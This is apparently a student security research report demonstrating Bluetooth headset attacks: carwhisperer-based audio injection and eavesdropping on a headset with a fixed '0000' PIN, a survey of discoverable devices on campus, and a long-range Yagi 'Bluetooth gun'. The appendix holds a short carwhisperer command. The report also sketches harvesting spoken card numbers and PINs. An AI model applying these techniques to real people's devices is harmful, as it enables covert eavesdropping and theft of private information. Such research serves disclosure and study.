Bluetooth Vulnerabilities: A Demonstration Based Report

By Patrick Lloyd, Ryan Steinmetz, Matt Taber and Ben Walter

 Abstract

This paper is the second part of a two part report in which we first gave an

overview of general Bluetooth vulnerabilities and the tools that are used to take

advantage of these vulnerabilities. We covered many different methods with a main

focus on Bluesnarfing and Bluetracking. In this, the second part of the report, we will

attempt to demonstrate at least one Bluetooth vulnerability with a set of software and

hardware provided to us from a number of sources.

Introduction

As mentioned in the first part of this paper, Bluetooth is more and more becoming

an essential part of the technological world in which we live. It is built into a multitude

of devices that we carry every day from cell phones and laptop computers to headsets and

even bracelets. It can have a range of anywhere from 1 meter to 100 meters, and even

these numbers can be expanded upon with a simple antenna attached to a Bluetooth

dongle. In this paper, we demonstrate the actual vulnerabilities that are inherent to

Bluetooth, mainly focusing on packet injection which relies on social attacks in addition

to the vulnerability.

Hypothesis

We believe that we can inject sounds, or packets of information, into a PLT 510

Bluetooth headset, merely by catching it in the middle of a discovery with another sound

device. There are ways to “crack” the device and inject packets without having to catch

it in the middle of a pairing, but for the sake of this experiment, we chose to not use
hacking techniques but rather those that would be more widely used within the outside

world.

Results

Complications

We originally planned to cover a multitude of demonstrations in this paper but ran

into a number of problems while trying to perform them. The main complication we ran

into was a very small budget for this experiment. In our original brainstorming for the

experiment we wanted to include a demonstration of Bluetracking, the ability to use three

different Bluetooth nodes to triangulate where a Bluetooth device is locate, but there is

very little software available to do so for less than thousands of dollars. The software we

were provided with was effective with scanning an immediate area for Bluetooth devices,

but had no way to tell an effective distance which the device was from the user. Due to

our student statuses and small budget within our department, other pieces of software

were far out of our reach.

Successful Results

Despite the complications that we ran into, we were able to demonstrate packet

injection into a PLT 510 headset using only the built in Bluetooth ability of a Dell Vostro

1500 laptop. There are a number of utilities on the internet, including a program called

carwhisperer, which allows the user to both record from and send messages to a headset

which it is able to connect to. The process by which this is done is by using the Linux

“hcitools” package and detecting a headset or Bluetooth device that may be in range. In

the case of our PLT 510, the device had to be in pairing mode to detect it successfully.

The problem with this, especially with the PLT 510 headset, is that it beeps in the ear
piece, letting the user know that someone has detected or attempted to connect to the

device. Most users would pass this off and ignore it as an error in the headset or a missed

call which the device didn’t register. This could be classified as a type of social attack

due to the user allowing the device to be paired despite being notified through a

notification beep.

The other vulnerability which allows for the headset to have packets injected into

it is the fact that it has a “0000” pin for association by default. This pin, along with

“1234”, is one of the most common pins with many headsets and devices set to have it as

their default pin as shipped by the manufacturer. The problem with the PLT 510 headset

is that it does not have the ability to change the pin, an essential feature with the overall

popularity of the two pins.

The actual procedure of injecting packets or listening to the conversation that the

user is having is actually a very simple one. Code is included to do exactly this in figure

1 of the appendix. While still in discoverable mode and while the user is pairing the

headset with their phone, a laptop computer can be set up within a 10 meter radius, as

defined by the class two range [1]. This could very easily take place in any public area,

such as a park, the airport, a parking lot (though due to the restrictions of Bluetooth, the

victim’s window would have to rolled down), or even a workplace. The laptop then

receives notification that the headset is trying to find a pairing partner. This is by no

special procedure of the laptop. If the laptop is in discoverable range of the headset, it

will be able to pick up the headset automatically with a message that the headset wants to

establish a pairing. A utility for performing a constant polling of local area devices is

discussed later in the paper.

 Once the laptop is paired with the headset, the audio properties of the laptop can

be set to use the headset as either the default recording device (Figure 2), playback device

(Figure 1), or both. In the case of this experiment, the headset was used alternately for

both tasks, but never for both at the same time. To inject a packet or sound into the

headset (Figure 1), the laptop sets the headset as the default playback device and uses a

sound player to play whatever sound is desired. In the case of our experiment, we were

able to play the default wav file included with carwhisperer, into the headset while

having a conversation on the headset with another party, without the other party’s

knowledge or ability to hear. This could be potentially dangerous if the attacker was able

to obtain the second party saying something which could be used for a social attack,

mainly because they would be unaware that the first party was hearing that sound file.

To listen to the conversation happening over the headset (Figure 2), the laptop can

be set to use the headset as the default recording device and a sound recording program,

in our case the built in carwhisperer raw file recording command, can be used to capture

the conversation that the user is having. This is also able to be done in a Windows

environment by using Windows’ Sound Recorder.

This conversation could also be used to play back information over the headset,

especially if there are a number of users, for example husband and wife, of the single

headset. With careful observation and planning, this could be used to obtain the last four

digits of a user’s social security number (the primary identification for most billing

services), bank account numbers, credit card numbers, or numeric pins that are spoken

out loud. As mentioned in the first part of the report, this could later be used for
blackmail or other malicious deeds if the victim is then followed or their phonebook and

calendar obtained and compared to the conversation.

For the sake of this report, we also chose to track the number of Bluetooth devices

that were found to be discoverable within two three hour periods of time in a classroom

building lounge and an open computing lab at Rochester Institute of Technology. The

tracking was done for an update of a statistic taken in 2002 at a conference in which they

found [2] that within just the 2004 CeBIT conference time period, a total of seven days,

5294 Bluetooth devices were detected as people merely walked by with their phones or

other devices set on discoverable mode. The most frightening detail in the report on the

results is that approximately 70% of all the devices found in the conference experiment

were “Vulnerable again SNARF attacks”, SNARFing being the ability for the attacker to

steal a victim’s phone numbers and calendar information.

. In our version of the experiment, every person passing by the scanning station

was counted as part of the scan. This was based on the assumption that within the 30

second polling period, the person’s device, if left in discoverable mode, would be

scanned at least once. We found that out of the 970 people passing by in the classroom

building lounge, only 14 had fully discoverable devices and within the open computing

lab a total of 13 out of 84 had discoverable devices. Both of these figures were hand

counted for the total and counted using BMon, a Bluetooth scanning utility by Center

Media Solutions for the counted number of devices. Both have the ability to be off,

based on the number of computers that were in the open computing lab which may or

may not have had Bluetooth capabilities, and human error in the counting of people

walking by while sitting in the classroom building lounge.

 Finally, as proof of concept, we decided to test out the “Bluetooth gun” a basic

Yagi antenna, attached to a paintball rifle stock. Our initial range tests with the rifle were

not very impressive as the range appeared to be limited to ten feet. A digital multi-meter

later revealed that the cable that connects the Bluetooth USB dongle to the actual antenna

itself was shorting the shield with the center conductor. Therefore, the cable itself

became the antenna and the Yagi antenna wasn’t being utilized. We obtained a

replacement coaxial cable through the Professor supervising our experiments and were

then able to de-solder the existing cable from the USB Bluetooth dongle and then solder

the new cable on. The results were excellent. Our initial ten foot range increased to

about three-hundred feet and illustrated the fact that we could exploit vulnerable devices

from a much farther range. While we were unable to test some of the sniffing ability we

would gain by having a re-flashed CSR Bluetooth dongle, we are quite confident that the

antenna would make these results even more impressive and add extensive range to our

packet injecting abilities.

Discussion

As can be seen by the detection statistics in the second part of our results,

manufacturers and users are both becoming smarter as to the vulnerabilities and security

precautions that can be taken to keep their Bluetooth devices safe. Where as a number of

critics may say that leaving a phone in non-discoverable mode may not be enough, with

commercial software that is well within budget of the average person, this has been seen

to be enough. As mentioned in the complications section of our report, for a person who

wants to crack a Bluetooth device not in discoverable mode, or triangulate the position of

a person with a Bluetooth device, their budget would have to be extensive, and certainly
larger than that of four graduate students or a Networking, Security and Systems

Administration department.

In contrast, there has not been enough exposure of headset vulnerabilities and the

issue of having a pairing code of “0000” or “1234”. These two pairing codes are still

extremely popular and therefore pieces of software such as carwhisperer are still very

much able to inject or record packets from such devices. As demonstrated in this paper,

this can be done in a Linux distribution using carwhisperer or can even be done in

Windows with the built in sound recorder.

Conclusion

This paper has been our demonstration of Bluetooth vulnerabilities utilizing a

number of different techniques to do so. We first used the program carwhisperer to inject

packets or sounds into a PLT 510 headset to demonstrate ability to do so on a headset

with the vulnerability of a “0000” pairing code. We then demonstrated the ability to use

the “Bluetooth gun” which can extend the range of an average Bluetooth dongle from 10

or 15 feet to approximately 300 feet. Finally, for proof of concept and additional

conclusions, we did a survey of Bluetooth devices within two different areas over a three

hour period each.

Acknowledgements

We thank Centermediasolutions.net for providing us with their software, BMon, a

piece of software which was extremely useful for scanning in our experiments as well as

detecting the devices with the Bluetooth gun. This allowed us to detect Bluetooth

devices without delay as many other pieces of software and software for use with built in
Bluetooth devices do. This software could easily be used with carwhisperer to find the

BDADDR of devices and then inject packets of sound into them without pairing.

Appendix

play.sh:

#!/bin/sh
./carwhisperer 0 $1 results.raw
00:03:89:93:F8:5D 1

Figure 1: Code for insertion of sound packets into the headset

play_recording.sh:
#!/bin/sh
sox -t raw -r 8000 -c 1 -s -w ./results.raw -t
wav -r 44100 -c 2 out.wav

Figure 2: Code for recording from headset and converting to a wav format

References

[1] Bialoglowy, Marek. "Bluetooth Security Review, Part 2." Bluetooth Security

Review, Part 2. 26 May 2005. Security Focus. 16 Sept. 2008

<http://www.securityfocus.com/infocus/1836>.

[2] Haase, Marc, and Matthias Handy. "BlueTrack – Imperceptible Tracking of

Bluetooth Devices." Haase.pdf. University of Rostock. 16 Sept. 2008

<http://ubicomp.org/ubicomp2004/adjunct/posters/haase.pdf>.